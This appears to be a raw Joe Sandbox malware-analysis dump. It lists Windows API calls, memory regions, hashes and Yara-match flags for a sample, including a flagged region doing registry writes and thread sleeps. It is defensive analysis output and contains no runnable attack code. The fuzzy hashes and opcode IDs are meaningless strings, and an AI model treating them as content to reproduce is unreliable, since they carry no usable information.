                                    • Instruction Fuzzy Hash: C111AF756007009BC760DF29C892EABB7F8FF56318B10456FE54697662DB78E900CB68
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FA60
                                    • RegSetValueExA.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0242FB14
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Valuewsprintf$CloseQuery
                                    • String ID:
                                    • API String ID: 1706290719-0
                                    • Opcode ID: 2ecc1b79f795a8aea3a0aa05e57f3edeab260d0d6f54c714d9fd68c7fad3251b
                                    • Instruction ID: 85f721448b23d604841ce4633397b934c2596c5bbb41b6bd2421e5b37f02637b
                                    • Opcode Fuzzy Hash: 2ecc1b79f795a8aea3a0aa05e57f3edeab260d0d6f54c714d9fd68c7fad3251b
                                    • Instruction Fuzzy Hash: F1014B30A01129DBCB24CB85E9987AAB3B1BF48315F9241DAC40AA7650C7308EC8CF04
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 4d85543fd17436e58ba078bad8b943e5fa0d03786c3e1af69959623a4667f77e
                                    • Instruction ID: ba9893cc8f100ad0b3a39a6083e079394941f54348bd908eadaa26412fa7e4d1
                                    • Opcode Fuzzy Hash: 4d85543fd17436e58ba078bad8b943e5fa0d03786c3e1af69959623a4667f77e
                                    • Instruction Fuzzy Hash: 68E09A75D41209DFCB41EFA8D545AAEBBF4FB49718F20857FE405E2601E3358A028BA5
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL(?,0063EB69), ref: 0063EBC7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    • Opcode ID: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                    • Instruction ID: 9f0b38d92756a723ceb96169532b773624dd3ef574d47a4c55ad65be51934596
                                    • Opcode Fuzzy Hash: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                    • Instruction Fuzzy Hash: A1D0A9B42006448FEF508F388908478BAE6EF89320B1145BCE8CBEB3A0E7349D40DB01
                                    APIs
                                    • LoadStringA.USER32(?,?,?,?), ref: 004C1DB4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: LoadString
                                    • String ID:
                                    • API String ID: 2948472770-0
                                    • Opcode ID: 3d3a2606062da20ca26e329862b022a914add25c0874867cd9b3240979695922
                                    • Instruction ID: 69b6ef5263b44f2a49d8b4a1a3e0c3466d80d96a7be98c8a95d7782beda83867
                                    • Opcode Fuzzy Hash: 3d3a2606062da20ca26e329862b022a914add25c0874867cd9b3240979695922
                                    • Instruction Fuzzy Hash: C5D0A77A5083A19BC751DF618C04D4FBBE8BF55320B044C1EF48443112C324E444C766
                                    APIs
                                    • ShowWindow.USER32(?,?,004164AE,?), ref: 004C0898
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 3b93d8d6697863ec1dce2086ca437407c7758a23342a8b6f57955f818e4957d7
                                    • Instruction ID: 5742d00c068640fda4af83234dbef36747e4fda6c0005153530314142d3b2437
                                    • Opcode Fuzzy Hash: 3b93d8d6697863ec1dce2086ca437407c7758a23342a8b6f57955f818e4957d7
                                    • Instruction Fuzzy Hash: 42D09234604200EFCB899F60C948F1ABBA2BF94704F648979E1868A525D736DC52EB69
                                    APIs
                                    • Sleep.KERNEL32(010B0023), ref: 024242A0
                                    • Sleep.KERNEL32(001B7740), ref: 024242AD
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024242BA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExitThreadUser
                                    • String ID:
                                    • API String ID: 3121592155-0
                                    • Opcode ID: aebd96fae0ea5bff74e03338655fd7eca7ca0477b1efdf6a1a85707232232603
                                    • Instruction ID: 728b24811fcf364388cfefe413d62b5502edce6332bba2d7936b1bbb472cb137
                                    • Opcode Fuzzy Hash: aebd96fae0ea5bff74e03338655fd7eca7ca0477b1efdf6a1a85707232232603
                                    • Instruction Fuzzy Hash: 351161B0E002358BEB65CB02CE447AA7771FB90305F5485FAC6097B644EB354ACACF18
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • DPtoLP.GDI32 ref: 0044263B
                                    • GetClientRect.USER32(?,?), ref: 00442649
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00442661
                                    • IntersectRect.USER32(?,?,?), ref: 00442700
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00442741
                                    • IntersectRect.USER32(?,?,?), ref: 0044279E
                                    • LPtoDP.GDI32(?,?,00000002), ref: 004427DF
                                    • CreateRectRgnIndirect.GDI32(?), ref: 0044280A
                                    • IntersectRect.USER32(?,?,?), ref: 0044283E
                                    • LPtoDP.GDI32(?,?,00000002), ref: 0044287F
                                    • CreateRectRgnIndirect.GDI32(?), ref: 004428A5
                                    • CreateRectRgnIndirect.GDI32(?), ref: 004428D4
                                    • GetCurrentObject.GDI32(?,00000006), ref: 004428F0
                                    • GetCurrentObject.GDI32(?,00000001), ref: 00442909
                                    • GetCurrentObject.GDI32(?,00000002), ref: 00442922
                                      • Part of subcall function 004C2854: SetBkMode.GDI32(?,?), ref: 004C286D
                                      • Part of subcall function 004C2854: SetBkMode.GDI32(?,?), ref: 004C287B
                                      • Part of subcall function 004BF646: GetScrollPos.USER32(00000000,00425D93), ref: 004BF664
                                      • Part of subcall function 00442150: CreateFontIndirectA.GDI32(00000000), ref: 004421A2
                                    • FillRgn.GDI32(?,?,?), ref: 00442B02
                                    • IntersectRect.USER32(?,?,?), ref: 00442BE7
                                    • IsRectEmpty.USER32(?), ref: 00442BF2
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00442C0F
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00442C1A
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 00442C4B
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00442C69
                                      • Part of subcall function 004C293B: SetMapMode.GDI32(?,?), ref: 004C2954
                                      • Part of subcall function 004C293B: SetMapMode.GDI32(?,?), ref: 004C2962
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00442CA8
                                    • IntersectRect.USER32(?,?,?), ref: 00442D3B
                                    • IsRectEmpty.USER32(?), ref: 00442D81
                                    • SelectObject.GDI32(?,?), ref: 00442DBC
                                    • DPtoLP.GDI32(?,?,00000001), ref: 00442E48
                                    • LPtoDP.GDI32(?,?,00000001), ref: 00442F67
                                    • DPtoLP.GDI32(?,?,00000001), ref: 00442F85
                                      • Part of subcall function 004C2C69: MoveToEx.GDI32(?,?,?,?), ref: 004C2C8B
                                      • Part of subcall function 004C2C69: MoveToEx.GDI32(?,?,?,?), ref: 004C2C9F
                                      • Part of subcall function 004C2CB5: MoveToEx.GDI32(?,?,?,00000000), ref: 004C2CCF
                                      • Part of subcall function 004C2CB5: LineTo.GDI32(?,?,?), ref: 004C2CE0
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                      • Part of subcall function 00445810: GetCurrentObject.GDI32(?), ref: 004458DB
                                      • Part of subcall function 00445810: LPtoDP.GDI32(?,00000000,00000001), ref: 00445928
                                    • IntersectRect.USER32(?,00000000,?), ref: 004430D2
                                    • IsRectEmpty.USER32(00000000), ref: 004430DD
                                    • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00443124
                                    • LPtoDP.GDI32(?,00000000,00000002), ref: 00443139
                                    • CreateRectRgnIndirect.GDI32(00000000), ref: 00443144
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 00443175
                                    • LPtoDP.GDI32(?,?,00000001), ref: 004431A4
                                    • DPtoLP.GDI32(?,?,00000001), ref: 004431C2
                                    • wsprintfA.USER32 ref: 00443260
                                    • SelectObject.GDI32(?,?), ref: 00443288
                                    • IntersectRect.USER32(?,?,?), ref: 004437F8
                                    • IsRectEmpty.USER32(?), ref: 00443803
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443820
                                    • CreateRectRgnIndirect.GDI32(?), ref: 0044382B
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 0044385C
                                    • GetSysColor.USER32(0000000F), ref: 004429E6
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                      • Part of subcall function 004C3191: __EH_prolog.LIBCMT ref: 004C3196
                                      • Part of subcall function 004C3191: CreatePen.GDI32(?,?,?), ref: 004C31B9
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00442766
                                      • Part of subcall function 00443D20: CopyRect.USER32(?,00000000), ref: 00443D97
                                      • Part of subcall function 00443D20: IsRectEmpty.USER32(?), ref: 00443DA2
                                      • Part of subcall function 00443D20: GetClientRect.USER32(00000000,?), ref: 00443DE1
                                      • Part of subcall function 00443D20: DPtoLP.GDI32(?,?,00000002), ref: 00443DF3
                                      • Part of subcall function 00443D20: LPtoDP.GDI32(?,?,00000002), ref: 00443E30
                                    • FillRect.USER32(?,?,?), ref: 00443B59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create$IndirectObject$Intersect$Empty$CurrentModeSelect$CombineH_prologMove$ClientFill$BeginBrushClipColorCopyFontLinePaintScrollSolidwsprintf
                                    • String ID: pTL
                                    • API String ID: 2506852199-168633513
                                    • Opcode ID: cb033b505ab1316746293166c1a3a38c0fb3801c4d6b98ed056ee4c4a8f6ab24
                                    • Instruction ID: d2de053ded7268b9f9fdcb53d722133c41dc83cabb2f61b19ae396333c7eeb03
                                    • Opcode Fuzzy Hash: cb033b505ab1316746293166c1a3a38c0fb3801c4d6b98ed056ee4c4a8f6ab24
                                    • Instruction Fuzzy Hash: B3D259B56083809FD364DF25C985FAFB7E9BBC8704F00891EF58A83251DB74A905CB66
                                    APIs
                                    • IsWindow.USER32(?), ref: 00429332
                                    • IsIconic.USER32(?), ref: 0042936A
                                    • SetActiveWindow.USER32(?,?,?), ref: 00429393
                                    • IsWindow.USER32(?), ref: 004293BD
                                    • IsWindow.USER32(?), ref: 0042968E
                                    • DestroyAcceleratorTable.USER32(?), ref: 004297DE
                                    • DestroyMenu.USER32(?), ref: 004297E9
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429803
                                    • DestroyMenu.USER32(?), ref: 00429812
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429872
                                    • DestroyMenu.USER32(?,000003EA,00000000,00000000,?,?,00000000,?,000007D9,00000000,00000000), ref: 00429881
                                    • SetParent.USER32(?,?), ref: 00429903
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?), ref: 00429A1B
                                    • IsWindow.USER32(?), ref: 00429B4C
                                    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 00429B61
                                    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00429B7E
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429BCC
                                    • IsWindow.USER32(?), ref: 00429C41
                                    • IsWindow.USER32(?), ref: 00429C91
                                    • IsWindow.USER32(?), ref: 00429CE1
                                    • IsWindow.USER32(?), ref: 00429D1E
                                    • IsWindow.USER32(?), ref: 00429DA1
                                    • GetParent.USER32(?), ref: 00429DAF
                                    • GetFocus.USER32 ref: 00429DF0
                                      • Part of subcall function 004291B0: IsWindow.USER32(?), ref: 0042922B
                                      • Part of subcall function 004291B0: GetFocus.USER32 ref: 00429235
                                      • Part of subcall function 004291B0: IsChild.USER32(?,00000000), ref: 00429247
                                    • IsWindow.USER32(?), ref: 00429E4F
                                    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 00429E64
                                    • IsWindow.USER32(00000000), ref: 00429E77
                                    • GetFocus.USER32 ref: 00429E81
                                    • SetFocus.USER32(00000000), ref: 00429E8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Destroy$AcceleratorFocusTable$MenuMessageSend$Parent$ActiveChildIconic
                                    • String ID: d
                                    • API String ID: 3681805233-2564639436
                                    • Opcode ID: e87a3fc29fcbea10c2aeaee14bba0306c1351c891291a1a06558fd05f4f9e5bf
                                    • Instruction ID: bccc638afaa4ac9f0b6628bff1f31bfaa2a79839a7b447135e494ceec8457570
                                    • Opcode Fuzzy Hash: e87a3fc29fcbea10c2aeaee14bba0306c1351c891291a1a06558fd05f4f9e5bf
                                    • Instruction Fuzzy Hash: 457289716043519BD320EF25E880B6FB7E9AF88704F54492EF94997341DB38EC45CBAA
                                    APIs
                                    • IsWindowEnabled.USER32(?), ref: 00431959
                                    • TranslateAccelerator.USER32(?,?,?), ref: 004319B3
                                    • IsChild.USER32(?,?), ref: 004319E4
                                    • GetFocus.USER32 ref: 00431B3F
                                    • PostMessageA.USER32(?,000000A1,00000002,00000000), ref: 00431BC9
                                    • PostMessageA.USER32(?,000000A1,00000002,00000000), ref: 00431C38
                                    • IsChild.USER32(?,00000000), ref: 00431CE1
                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00431CB2
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • IsWindow.USER32(?), ref: 004325B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChildMessage$PostWindow$AcceleratorEnabledFocusParentSendTranslate
                                    • String ID: 0$9$A$Z$hlp
                                    • API String ID: 3372979518-114186910
                                    • Opcode ID: 0f55ff760e6b3e40c6da52bc767bf589934480f50a4d999177b276bd593de1c4
                                    • Instruction ID: a3fde701ff64b052509432ab22a5561929a7d46fabc4da07dc5bb46c27768338
                                    • Opcode Fuzzy Hash: 0f55ff760e6b3e40c6da52bc767bf589934480f50a4d999177b276bd593de1c4
                                    • Instruction Fuzzy Hash: 4872C1706043419BEB24DF24C991BABB3E4AF88704F10192FF94697391DB78ED45CB6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e$n]
                                    • API String ID: 0-2485170652
                                    • Opcode ID: bc8863562cd63b47be5c68d16e4a16415af0bb7440cbed4e108292fb2e0a5c69
                                    • Instruction ID: 9dc91882277d9f3a72de3379226257b71765dbb069ace20db160ba22b7db4824
                                    • Opcode Fuzzy Hash: bc8863562cd63b47be5c68d16e4a16415af0bb7440cbed4e108292fb2e0a5c69
                                    • Instruction Fuzzy Hash: 38E1EE30D5D2099EEF258F68C8157FE7BB1FB94308F28405BD441A6282D77C9A82DB79
                                    APIs
                                    • IsIconic.USER32(?), ref: 00432B1C
                                    • IsZoomed.USER32(?), ref: 00432B2A
                                    • LoadLibraryA.KERNEL32(User32.dll,00000003,00000009), ref: 00432B54
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00432B67
                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00432B75
                                    • FreeLibrary.KERNEL32(00000000), ref: 00432BAB
                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00432BC1
                                    • IsWindow.USER32(?), ref: 00432BEE
                                    • ShowWindow.USER32(?,00000005,?,?,?,?,00000004), ref: 00432BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressLibraryProcWindow$FreeIconicInfoLoadParametersShowSystemZoomed
                                    • String ID: GetMonitorInfoA$H$MonitorFromWindow$User32.dll
                                    • API String ID: 447426925-661446951
                                    • Opcode ID: 3b97d3e644612fe363b93e0eb0b50ac682f4af31a2ebda8b893ca15921ddcfb6
                                    • Instruction ID: 7f2ac038bd2d31b09cfce74ed2631c40ecbd3596fd08124acce7addb461452f5
                                    • Opcode Fuzzy Hash: 3b97d3e644612fe363b93e0eb0b50ac682f4af31a2ebda8b893ca15921ddcfb6
                                    • Instruction Fuzzy Hash: 04315071700301AFD7549F65DD49F6BB7A8EF88B51F00852DFA0197290EBB8E8058B69
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0042B655
                                    • IsWindow.USER32(00010444), ref: 0042B671
                                    • SendMessageA.USER32(00010444,000083E7,?,00000000), ref: 0042B68A
                                    • ExitProcess.KERNEL32 ref: 0042B69F
                                    • FreeLibrary.KERNEL32(00000000), ref: 0042B783
                                    • FreeLibrary.KERNEL32 ref: 0042B7D7
                                    • DestroyCursor.USER32(0001044D), ref: 0042B827
                                    • DestroyCursor.USER32(0001044F), ref: 0042B83E
                                    • IsWindow.USER32(00010444), ref: 0042B855
                                    • DestroyCursor.USER32(?), ref: 0042B904
                                    • WSACleanup.WS2_32 ref: 0042B94F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroy$FreeLibraryWindow$CleanupCurrentExitMessageProcessSendThread
                                    • String ID:
                                    • API String ID: 2560087610-0
                                    • Opcode ID: 0a4a7a849c15d22bd8664f7ebad6e976fdfcac5c23d335b0e0f0ba3a915df99d
                                    • Instruction ID: 0b2dd4f20ebe15ecfa3e858e282a9ca4417d797460f0035a8a180f680c79ec7a
                                    • Opcode Fuzzy Hash: 0a4a7a849c15d22bd8664f7ebad6e976fdfcac5c23d335b0e0f0ba3a915df99d
                                    • Instruction Fuzzy Hash: 9DB16B707007129BC724EF65D9C5BABB7E8FF88304F90452EE59A87251CB34A981CB99
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B304
                                    • LoadLibraryA.KERNEL32(?,00000000,00000000,00000000,?,?,005BDD18,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B341
                                    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0042B377
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B382
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B390
                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0042B49D
                                    • RegisterTypeLib.OLEAUT32(00000000,00000000), ref: 0042B4D2
                                    • UnRegisterTypeLib.OLEAUT32(?,00000000,00000000,00000000,00000001), ref: 0042B5B3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$LoadType$FreeRegister$AddressProc
                                    • String ID: DllRegisterServer$DllUnregisterServer
                                    • API String ID: 3854050662-2931954178
                                    • Opcode ID: 56a62f79e5bb7b8018905c1d8112b0badcf0139f0c3876621e0cd81a5a49d142
                                    • Instruction ID: 76d69a9f861e45228f9a270b00dcf8b9d0853e10be80916bdc3fc6a9249d7692
                                    • Opcode Fuzzy Hash: 56a62f79e5bb7b8018905c1d8112b0badcf0139f0c3876621e0cd81a5a49d142
                                    • Instruction Fuzzy Hash: CBB1C771A00219ABDB10EFA5DC85FEEB778EF44318F14851EF815A7281DB38AA05C7A5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e72fab869b7830de43de657770806bae53d07d8b936d09fafce9cd7235fa3e36
                                    • Instruction ID: 8c6d8a1bb802cc77c7d8300e25974a1a2ad45b78ae07d474c78f121c11565c88
                                    • Opcode Fuzzy Hash: e72fab869b7830de43de657770806bae53d07d8b936d09fafce9cd7235fa3e36
                                    • Instruction Fuzzy Hash: 9D629374A002168FCB24CF58C980AEEB7B5FF48310F24855EE955DB350E7B89D91CB9A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cd25bca39a44b7981de839c7ec6c5e56b393834db2e7c3c93848204de438dca
                                    • Instruction ID: 0b69258b78a94232ea45e90751ebba9429014fc21b44ed921dac73b9a2ed8979
                                    • Opcode Fuzzy Hash: 7cd25bca39a44b7981de839c7ec6c5e56b393834db2e7c3c93848204de438dca
                                    • Instruction Fuzzy Hash: 07C1E3767046248FE350EF2AEC81A6BB394FB84314F904D2FE546C7342D73AE9168799
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BD596
                                    • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004BD5CE
                                    • LoadResource.KERNEL32(?,00000000,?,?,?,00000000), ref: 004BD5D6
                                      • Part of subcall function 004BE3D0: UnhookWindowsHookEx.USER32(?), ref: 004BE3F5
                                    • LockResource.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 004BD5E3
                                    • IsWindowEnabled.USER32(?), ref: 004BD616
                                    • EnableWindow.USER32(?,00000000), ref: 004BD624
                                    • EnableWindow.USER32(?,00000001), ref: 004BD6B2
                                    • GetActiveWindow.USER32 ref: 004BD6BD
                                    • SetActiveWindow.USER32(?,?,?,00000000,?,?,?,00000000), ref: 004BD6CB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                    • String ID:
                                    • API String ID: 401145483-0
                                    • Opcode ID: 7ee4d44cd478f37651b083675d3a67ebd4a6ce63556e7ca6870621659aea832f
                                    • Instruction ID: 099d29b2a617709e34e576c3bec1c38262f4b9fda674ba44a6343ca5e27ea6f5
                                    • Opcode Fuzzy Hash: 7ee4d44cd478f37651b083675d3a67ebd4a6ce63556e7ca6870621659aea832f
                                    • Instruction Fuzzy Hash: A341BE30D00604EBCB21AB69CC45AAFBBB5EF88715F10016FE506A2291EB799D41CB7D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID:
                                    • API String ID: 2111968516-0
                                    • Opcode ID: 3cc8303d9c0b2da8ef1b465b5ac39fc9e1971b3d1463f2587146489e217abde3
                                    • Instruction ID: 5e0aa42a305c906cdfdf45c81aef29299b8113573d44750213990bcc0427a42d
                                    • Opcode Fuzzy Hash: 3cc8303d9c0b2da8ef1b465b5ac39fc9e1971b3d1463f2587146489e217abde3
                                    • Instruction Fuzzy Hash: C362D371B043119FD724DF25E880B6FB7E5AFC5318F54492EE88A97341DB38E8058B9A
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BCF0E
                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 004BCF2C
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 004BCF3B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004BCF6F
                                    • CharUpperA.USER32(?), ref: 004BCF80
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004BCF96
                                    • FindClose.KERNEL32(00000000), ref: 004BCFA2
                                    • lstrcpy.KERNEL32(?,?), ref: 004BCFB2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                    • String ID:
                                    • API String ID: 304730633-0
                                    • Opcode ID: ab8fe3b05ce3e2c1520c56ff373905d7cd6e849965183c7ed21f404da1f39662
                                    • Instruction ID: 6d489353f00fc286b2f419a927c4974f029f5376da39763447c9774335aca43c
                                    • Opcode Fuzzy Hash: ab8fe3b05ce3e2c1520c56ff373905d7cd6e849965183c7ed21f404da1f39662
                                    • Instruction Fuzzy Hash: F4217831900019BACB109FA5DC88EEFBF7DEF09764F00416AF819E21A0C7388A45CBA4
                                    APIs
